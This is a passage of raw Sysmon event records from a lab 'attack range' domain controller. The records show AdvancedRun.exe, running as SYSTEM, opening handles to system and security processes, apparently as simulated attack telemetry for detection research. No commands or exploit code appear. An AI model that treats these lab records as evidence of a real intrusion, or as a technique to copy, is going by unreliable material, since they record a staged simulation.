NI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080474Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.462{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080473Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.461{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080472Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.461{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080471Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.461{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080470Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.461{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080469Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.461{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004080468Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.460{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080467Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.460{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080466Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.460{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080465Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.460{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080464Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.460{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080463Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.460{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080462Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.460{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004080461Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.459{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004080460Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 